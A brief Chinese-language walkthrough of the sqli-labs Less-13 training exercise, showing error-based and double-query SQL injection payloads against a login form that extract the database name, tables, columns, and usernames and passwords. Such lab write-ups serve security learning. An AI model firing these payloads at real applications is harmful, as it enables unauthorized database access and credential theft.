#sqli-labs less13

由于less12 和less 11 差不多，只是单引号变成 "） 所以我们直接来解决less 13

对待less13 我们按老规矩判断其是数值型还是字符型 。。。。。。

然后我们发现他是’)

所以我们继续往下走

admin ’ order by n #

发现n=1 n=2 虽然没有想象中的回显，但是当n=3时，可以发现

所以可以判断字段数为2

接下来试试admin ') union select 1,2 #

发现没有回显位，试试 在 passwd 后面添加 11’) union select 1,2 #

发现还是没有

。。。

再能试试报错型注入

爆数据库名称

11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),database())as x from information_schema.tables group by x)as a)–+

11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(table_name)from information_schema.tables where table_schema=‘security’ limit 0,1))as x from information_schema.tables group by x )as a)#

11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(column_name)from information_schema.columns where table_name=‘users’ limit 0,1))as x from information_schema.tables group by x )as a)#

11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username)from security.users limit 0,1))as x from information_schema.tables group by x )as a)#

11’) and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(password)from security.users limit 0,1))as x from information_schema.tables group by x )as a)#

.

.

.

.

也可以用双查询注入
')union select count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2))x from information_schema.tables group by x#